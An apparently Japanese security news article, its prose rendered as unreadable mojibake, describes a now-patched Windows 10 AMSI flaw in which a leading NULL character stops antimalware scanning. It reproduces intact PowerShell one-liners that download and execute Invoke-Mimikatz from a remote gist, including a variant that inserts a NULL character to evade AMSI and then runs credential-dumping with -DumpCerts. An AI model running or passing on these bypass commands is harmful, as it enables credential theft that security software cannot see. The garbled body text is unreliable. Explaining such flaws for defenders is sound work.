NULLæåãå«ãã³ãã³ããå®è¡ããã¨ç¡è¦ãããã°ãAMSIã«åå¨ãMicrosoft社ã¯æä¾ãããã§ä¿®æ£æ¸ã¿ã
Â
Windows 10ã«æ¨æºæè¼ããã¦ããAMSIã¨ããæ©è½ã«ãã°ããããNULLæåãå é ã«å«ãã ã³ãã³ããå®è¡ããã¨ãã»ãã¥ãªãã£ã½ããã«ããæ¤ç¥ããã¤ãã¹ãã¦ä»»æã®ã³ãã³ããå®è¡ãã¦ãã¾ãã
ãã®ãã°ã¯ãã«ããã»ãã³ã¯ã¼ãã¼ã§æ´»åããSatoshiTandaæ°ã®ããã°ã§å ¬éãããã
æ¢ã«Microsoftã¯ä»æã®æä¾ãããã§ãããããªãªã¼ã¹ãã¦ããããããã§ä¸åº¦AMSIã«è¦ã¤ãã£ããã°ã¨ããã®ã¨ã¯ã¹ããã¤ãææ³ã«ã¤ãã¦è¦ã¦ãããã
Â
AMSIã¨ã¯ä½ã
AMSIã¨ã¯ãAntimalware Scan Interfaceã®ç¥ã
Windows 10ããæè¼ãããã»ãã¥ãªãã£æ©è½ã®ï¼ã¤ã§ãããä»»æã®ã¢ããªã¨ãã¨ã³ããã¤ã³ãã»ãã¥ãªãã£ã½ããã®âä¸éç¹âã«ç«ã¤æ©è½ã§ããã
AMSIã¯PowerShellãVBScriptçã®ã³ãã³ãã¹ã¯ãªãããå®è¡ããéã«ã¤ãã³ããä½æããAMSIãããã¤ãã¼ï¼ã»ãã¥ãªãã£ã½ããï¼ã«éä¿¡ããã
ã»ãã¥ãªãã£ã½ããã¯ãAMSIããåä¿¡ããã¹ã¯ãªãããã³ãã³ãã®å 容ãã¹ãã£ã³ããäºãåºæ¥ãæªæã®ããã³ã¼ããå«ãã ã¹ã¯ãªããã§ããã¨å¤æããå ´åã¯å®è¡ãé²ãã
ãã®ãã°ã®çºè¦è ã§ããTandaæ°ã®ããã°ã§ã¯ããã®ããã»ã¹ã以ä¸ã®å³ã使ã£ã¦èª¬æãã¦ããã
(AMSIãâä¸éâã«åå¨ãã¦ã³ãã³ãã®ãã§ãã¯ãè¡ã£ã¦ããäºã示ãå³ãTandaæ°ã®ããã°è¨äºããå¼ç¨ã)
Â
å³ä¸ã®å·¦å´ã«ä½ç½®ãã¦ããã®ã¯ãPowerShellï¼System.Management.Automation.dllãªã©ï¼ããWindows Script Hostï¼JScript.dllãªã©ï¼ã®ã¹ã¯ãªããã¨ã³ã¸ã³ã ã
ããã¦ãå³ã®ä¸å¤®ã«ä½ç½®ããã®ã¯AMSIã§ãå³å·¦ã®ã¹ã¯ãªããã¨ã³ã¸ã³ãããã³ãã³ããã¹ã¯ãªãããå®è¡åã«åãåãã
æå¾ã«ãå³ä¸ã®å³å´ã«è¨è¼ããã¦ããâAMSI Providerâã¯ãã»ãã¥ãªãã£ã½ããã¦ã§ã¢ã示ãã
ããã§ããã»ãã¥ãªãã£ã½ããã¨ã¯ãåã«Windows Defenderã«éãããAMSIã«å¯¾å¿ãã¦ããã»ãã¥ãªãã£ã½ããã§ããã
AMSIããã¹ã¯ãªãããåãåã£ã¦ãããããã®æ¹æ³ã§ã¹ãã£ã³ãããæªæã®ããã³ã¼ããå«ãã¨å¤æããå ´åã«ã¯ãããã¯ããå®è¡ãæªç¶ã«é²ãäºãåºæ¥ãã®ã ã
Â
AMSIã«çºè¦ããããã°ã®ã¨ã¯ã¹ããã¤ã
ããã§ã¯åã»ã¯ã·ã§ã³ã®AMSIã«é¢ãã説æãè¸ã¾ãã¦ãå®éã«ã©ã®ãããªãã°ãããã®ãè¦ã¦ããã
ãã®ã¨ã¯ã¹ããã¤ããç°¡åã«èª¬æããã¨ãAMSIãåãåãã¹ã¯ãªããã«âNULLâæåãå ¥åããäºã§ããã以éã®ã¹ã¯ãªããã®ã¹ãã£ã³ããããªããªãã
Â
ãã®ãã°ã®çºè¦è ã§ããTandaæ°ã®ããã°ã§ã¯ã以ä¸ã®2ãã¿ã¼ã³ã§ã¨ã¯ã¹ããã¤ãããæ¹æ³ã説æãã¦ããã
- ãã¡ã¤ã«ãã¼ã¹
- CUIãã¼ã¹
æµãã¨ãã¦ã¯ã以ä¸ã®ããã«ãªãã
- ãã¡ã¤ã«ãã¼ã¹ã®ãã¤ãã¹ææ³ã使ã£ã¦ãGitHubããã¿ã¼ã²ãã端æ«ã«ã¨ã¯ã¹ããã¤ããã¼ã«ããã¦ã³ãã¼ããã
- CUIãã¼ã¹ã®ãã¤ãã¹ææ³ã§ãå®éã«ä»»æã®ã³ãã³ããå®è¡ãã
ã§ã¯ãããããã«ã¤ãã¦èª¬æãã¦ããã
Â
ãã¡ã¤ã«ãã¼ã¹ã®ã¨ã¯ã¹ããã¤ã
ä¾ãã°ãInvoke-Mimikatzãå®è¡ãã¦ã¿ã¼ã²ãã端æ«ãã¨ã¯ã¹ããã¤ãããæ¹æ³ãèããã
å°ãMimikatzã¨ã¯ãã¢ã«ã¦ã³ãæ å ±ãªã©ãã¿ã¼ã²ãã端æ«ããçªåããçºã«ä½¿ããããããã³ã°ãã¼ã«ã§ããã
Â
ããã§ã¯ã以ä¸ã®PowerShellã³ãã³ããå®è¡ãã¦Mimikatzããã¦ã³ãã¼ããã¦ã¿ããã
powershell "IEX (New-Object Net.WebClient).DownloadString('hxxps://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-DefaultMimikatz.ps1')"
Â
ããã¨ã以ä¸ã®æ§ãªã¢ã©ã¼ããä¸ããã
Â
(AMSIãæ£å¸¸ã«åä½ãæ¤ç¥ã¢ã©ã¼ããä¸ãã£ããTandaæ°ã®ããã°è¨äºããå¼ç¨ã)
Â
ãã®å ´åAMSIãæ£å¸¸ã«æ©è½ãã¦ããã以ä¸ã®æ§ã«ãã¦ã³ãã¼ããããã¡ã¤ã«ã®ä¸ã«âMimikatzâã¨ããæååãå«ã¾ãã¦ããäºããAMSIãæ£å¸¸ã«æ¤ç¥ãã¦ããäºã示ãã
Â
(InvokeâMimikatzã¨ããæååãèªèããã¦ãããTandaæ°ã®ããã°è¨äºããå¼ç¨ã)
Â
次ã«ã以ä¸ã®ããã«NULLæåãå«ãã PowerShellã³ãã³ããå®è¡ããã
powershell "IEX (New-Object Net.WebClient).DownloadString('hxxps://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1')"
Â
(NULLæåãæ¿å ¥ãTandaæ°ã®ããã°è¨äºããå¼ç¨ã)
Â
ããã¨ãAMSIããã³ãã³ããåãåãã¯ãã®ã»ãã¥ãªãã£ã½ããã«ããæ¤ç¥ããªãããã以ä¸ã®ããã«ãã¦ã³ãã¼ããæåããã
(Invoke-Mimikatzã®ãã¦ã³ãã¼ãã«æåãã¦ãããTandaæ°ã®ããã°è¨äºããå¼ç¨ã)
Â
以ä¸ã®ç»åãè¦ãã¨ãAMSIãMimikatzã¨ããæååãèªèãã¦ããªããã¨ãåããã
(æ£å¸¸ã«åä½ããå ´åInvokeâMimikatzã®æååãããã¯ãã ããä½ãèªèããã¦ããªããTandaæ°ã®ããã°è¨äºããå¼ç¨ã)
ã³ãã³ãã©ã¤ã³ãã¼ã¹
ä¸è¨ã®ãã¡ã¤ã«ãã¼ã¹ã®ãã¤ãã¹ææ³ã使ã£ã¦ãAMSIã«ããæ¤ç¥ãéãã¦ã¿ã¼ã²ãã端æ«ã«ãã¦ã³ãã¼ãæåã§ããã
ç¶ãã¦ãCUIãã¼ã¹ã§ã¿ã¼ã²ãã端æ«ã§AMSIã«ããæ¤ç¥ããã¤ãã¹ããã³ãã³ããå®è¡ãã¦ã¿ããã
ã¾ãåãã«æ£å¸¸ã«AMSIãæ©è½ããå ´åã«ãMimikatzãæ¤ç¥ãã¦å®è¡ãé²ãã±ã¼ã¹ãèããã
以ä¸ã®ã³ãã³ããå®è¡ããã¨ãâInvoke-Mimikatzâã¨ããæååãããããã«æ¤ç¥ããã¦ãã¾ãã
Â
powershell "IEX (New-Object Net.WebClient).DownloadString('hxxps://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1'); Invoke-Mimikatz -DumpCerts"
Â
ã³ãã³ãã©ã¤ã³ã使ã£ãæ¤ç¥ãéããçºã®æ¹æ³ã¨ãã¦ã以ä¸ã®æ§ã«ã³ãã³ããç·¨éãã¦ãã¤ãã¹ããæ¹æ³ãããããAMSIã«ããæ¤ç¥ã¯é¿ããããªãã
Â
powershell "IEX (New-Object Net.WebClient).DownloadString('hxxps://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1'); IEX ('Invoke-'+'Mimikatz -DumpCerts')"
Â
å®éã«è¦ã¦ã¿ãã¨ãæ£å¸¸ã«æ¤ç¥ãã¦ããäºãåããã ããã
(æ£å¸¸ã«âInvokeâMimikatzâã¨ããæååãèªèãã¦ãããTandaæ°ã®ããã°è¨äºããå¼ç¨ã)
Â
ããã§ã¯ãNULLæåãã¨ã¯ã¹ããã¤ãã³ãã³ãã®å é ã«æ¿å ¥ãã¦ã以ä¸ã®ã³ãã³ããå®è¡ãã¦ã¿ããã
赤åã«ãªã£ã¦ããæååã¯ãNULLæåã®æ¿å ¥ãæå³ããã
Â
powershell "IEX (New-Object Net.WebClient).DownloadString('hxxps://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1'); IEX ('if(0){{{0}}}' -f $(0 -as [char]) + 'Invoke-'+'Mimikatz -DumpCerts')"
Â
ãã®ã³ãã³ããå®è¡ããã¨ã以ä¸ã®ããã«è¡¨ç¤ºãããã¯ãã ã
Â
if (0) {<NULL>}
Â
å®éã«ãAMSIã«ããæ¤ç¥ããã¤ãã¹ãã¦ã³ãã³ããå®è¡ãããäºãåããã
(NULLæå以éã®ã³ãã³ããèªèããã¦ããªããTandaæ°ã®ããã°è¨äºããå¼ç¨ã)
Â
å®éã«ã³ãã³ãããã³ããã表示ãããMimikatzãå®è¡ããã¦ããã
(Mimikatzãèµ·åãã¦ãããTandaæ°ã®ããã°è¨äºããå¼ç¨ã)
Â
ãã®ãã°ã示åããç¾å¨ã®æ»æãã¬ã³ã
ä»åTandaæ°ã«ãã£ã¦çºè¦ããããã°ã¯ãæ¢ã«èªåãããã«å«ã¾ãã¦ããã
ãã®äºãããææ°ã®ã¢ãããã¼ããè¡ãã°ãã®ãã°ãçªãã¨ã¯ã¹ããã¤ããæåããå¯è½æ§ã¯ä½ããªãã
ãããæè¿ã®æ»æè ã®ãã¬ã³ãã¨ãã¦ãWindowså ¬å¼ã®ã¢ããªã«åå¨ãããã°ãã¨ã¯ã¹ããã¤ããã¦PowerShellã³ã¼ããå®è¡ããææ³ãæµè¡ãã¦ããäºãèããã¨ãç¡è¦ã§ãããã°ã§ã¯ç¡ãäºãåããã
âå¾æ¥ã®âããã¡ã¤ã«åã»ãã«ã¦ã§ã¢ããããããã¡ã¤ã«ã¬ã¹ã»ãã«ã¦ã§ã¢ããæªç¨ããæ»æææ³ã«åãæ¿ããæ»æè ããããã¨ãæ»æã®ããªã¨ã¼ã·ã§ã³ãï¼ã¤å¢ããäºã«ãªãã
æ¢ã«å æ¥è¡ãããPatch Tuesdayã§ãããããããã°ãªã®ã§ãã·ã¹ãã 管çè ã¯ã¨ã³ãã¦ã¼ã¶ã¼ã«è¿ éãªãããé©ç¨ãå¼ã³ããããã